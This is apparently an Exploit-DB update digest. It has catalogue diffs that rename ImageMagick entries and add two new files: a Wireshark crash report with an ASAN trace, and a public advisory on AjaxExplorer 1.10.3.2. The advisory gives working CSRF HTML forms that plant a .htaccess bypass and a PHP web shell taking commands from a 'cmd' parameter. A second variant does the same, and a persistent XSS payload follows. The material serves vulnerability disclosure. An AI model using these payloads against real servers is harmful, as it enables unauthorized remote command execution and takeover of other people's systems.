DB: 2016-06-02

2 new exploits

GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability
GeekLog 2.x - ImageImageMagick.php Remote File Inclusion Vulnerability

ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability
ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow Vulnerability

ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability
ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow Vulnerability

ImageMagick < 6.9.3-9 - Multiple Vulnerabilities
ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)

ImageMagick Delegate Arbitrary Command Execution
ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities
Wireshark - erf_meta_read_tag SIGSEGV

files.csv

@@ -3599,7 +3599,7 @@ id,file,description,date,author,platform,type,port
 3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0
 3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability",2007-05-17,"Mehmet Ince",php,webapps,0
 3945,platforms/linux/dos/3945.rb,"MagicISO <= 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0
-3946,platforms/php/webapps/3946.txt,"GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0
+3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0
 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-05-17,"Alkomandoz Hacker",php,webapps,0
 3948,platforms/php/webapps/3948.txt,"Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability",2007-05-18,"Mehmet Ince",php,webapps,0
 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability",2007-05-18,MurderSkillz,php,webapps,0
@@ -22657,7 +22657,7 @@ id,file,description,date,author,platform,type,port
 25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0
 25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (1)",2005-04-25,kf,linux,dos,0
 25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (2)",2005-04-25,kf,linux,remote,0
-25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0
+25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0
 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.php Cross-Site Scripting Vulnerability",2005-04-25,deluxe89,php,webapps,0
 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 Default.ASP Multiple SQL Injection Vulnerabilities",2005-04-25,Dcrab,asp,webapps,0
 25530,platforms/asp/webapps/25530.txt,"OneWorldStore IDOrder Information Disclosure Vulnerability",2005-04-25,Lostmon,asp,webapps,0
@@ -25433,7 +25433,7 @@ id,file,description,date,author,platform,type,port
 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0
 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0
 28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0
-28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0
+28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0
 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0
 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
 28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service Vulnerability",2006-08-13,"Yan Rong Ge",linux,dos,0
@@ -35960,7 +35960,7 @@ id,file,description,date,author,platform,type,port
 39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0
 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0
-39767,platforms/multiple/dos/39767.txt,"ImageMagick < 6.9.3-9 - Multiple Vulnerabilities",2016-05-04,"Nikolay Ermishkin",multiple,dos,0
+39767,platforms/multiple/dos/39767.txt,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0
 39768,platforms/multiple/dos/39768.txt,"OpenSSL Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0
 39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
 39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
@@ -35982,7 +35982,7 @@ id,file,description,date,author,platform,type,port
 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
-39791,platforms/multiple/local/39791.rb,"ImageMagick Delegate Arbitrary Command Execution",2016-05-09,metasploit,multiple,local,0
+39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0
 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
 39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0
 39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
@@ -36057,3 +36057,5 @@ id,file,description,date,author,platform,type,port
 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
+39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
+39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0

platforms/multiple/dos/39877.txt

@@ -0,0 +1,24 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=803
+
+The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==28415==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000022d84 (pc 0x7f0e1b0002a2 bp 0x7ffde25a76f0 sp 0x7ffde25a7630 T0)
+    #0 0x7f0e1b0002a1 in erf_meta_read_tag wireshark/wiretap/erf.c:1242:13
+    #1 0x7f0e1afff0f0 in populate_summary_info wireshark/wiretap/erf.c:1851:27
+    #2 0x7f0e1aff34d6 in erf_read wireshark/wiretap/erf.c:447:7
+    #3 0x7f0e1b1a746b in wtap_read wireshark/wiretap/wtap.c:1245:7
+    #4 0x528196 in load_cap_file wireshark/tshark.c:3478:12
+    #5 0x51e67c in main wireshark/tshark.c:2192:13
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV wireshark/wiretap/erf.c:1242:13 in erf_meta_read_tag
+==28415==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12352. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39877.zip
+

platforms/php/webapps/39876.txt

@@ -0,0 +1,177 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
+
+[+] ISR: apparitionsec
+
+
+Vendor:
+==========
+sourceforge.net
+smsid
+
+download linx:
+sourceforge.net/projects/ajax-explorer/files/
+
+
+Product:
+=======================
+AjaxExplorer v1.10.3.2
+
+Manage server files through simple windows like interface.
+
+
+Vulnerability Type:
+=======================
+Remote Command Execution
+CSRF
+Persistent XSS
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+AjaxExplorer has command terminal feature where you can move, copy, delete
+files etc... also lets a user save commands in a
+flat file named "terminal" under their user profile
+"/ae.user/owner/myprofile".
+
+e.g.
+
+copy [FILEPATH + FILENAME] [FILEPATH]
+create [FILEPATH + FILENAME]
+
+Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
+application by first creating an .htaccess file with an
+"allow from all" directive to bypass access restrictions, next create
+arbitrary PHP files for remote command execution purposes.
+This exploit will require two consecutive HTTP requests, so we need to
+target an iframe to stay on same page until exploit is completed.
+
+
+Exploit code(s):
+===============
+
+1) first POST request creates .htaccess file so we can bypass directory
+browsing restrictions.
+2) second POST writes our remote command execution file we will then access
+to execute commands on the victim system.
+
+The below P:/ for "strPath" form value is for "Profile"
+
+
+<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
+
+<form target="PWNED" id="htaccess" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
+method="post">
+<input type="hidden" name="strPage" value="control/file/editor" >
+<input type="hidden" name="strPath" value="P:/" >
+<input type="hidden" name="strFile" value=".htaccess" >
+<input type="hidden" name="strText" value='allow from all' >
+<script>document.getElementById('htaccess').submit()</script>
+</form>
+
+<form target="PWNED" id="RCE" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
+method="post">
+<input type="hidden" name="strPage" value="control/file/editor" >
+<input type="hidden" name="strPath" value="P:/" >
+<input type="hidden" name="strFile" value="terminal.php" >
+<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
+<script>document.getElementById('RCE').submit()</script>
+</form>
+
+Now we can access and run arbitrary cmds.
+
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
+:\\Windows\\system32\\calc.exe
+
+
+/////////////////////////////////////////////////////
+
+
+Here is another way to RCE this application... first create PHP file then
+edit.
+
+<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
+
+<form target="DOOM" id="CSRF2" method="post" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
+<input type="hidden" name="strPage" value="control/file/editor" />
+<input type="hidden" name="strPath" value="D:/" />
+<input type="hidden" name="strFile" value="PWNED.php" />
+<input type="hidden" name="strText"
+value="<?php%20exec($_GET['cmd']);%20?>" />
+</form>
+
+<form target="DOOM" id="CSRF1" method="post" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
+<input type="hidden" name="strPage" value="control/file/create" />
+<input type="hidden" name="strPath" value="D:/" />
+<input type="hidden" name="strFile" value="D:/PWNED.php" />
+<script>
+document.getElementById('CSRF1').submit()
+document.getElementById('CSRF2').submit()
+</script>
+</form>
+
+
+////////////////////////
+
+Persistent XSS:
+================
+
+We can also write persistent XSS payload to the user profile "terminal"
+file.
+
+<form id="XSS" method="post" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
+<input type="hidden" name="strPage" value="control/file/editor" />
+<input type="hidden" name="strPath" value="P:/" />
+<input type="hidden" name="strFile" value="terminal" />
+<input type="hidden" name="strText" value="<script>alert(666)</script>" />
+<script>document.getElementById('XSS').submit()</script>
+</form>
+
+
+
+Disclosure Timeline:
+===============================
+Vendor Notification:  NA
+June 1, 2016  : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+================
+8.0 (High)
+CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx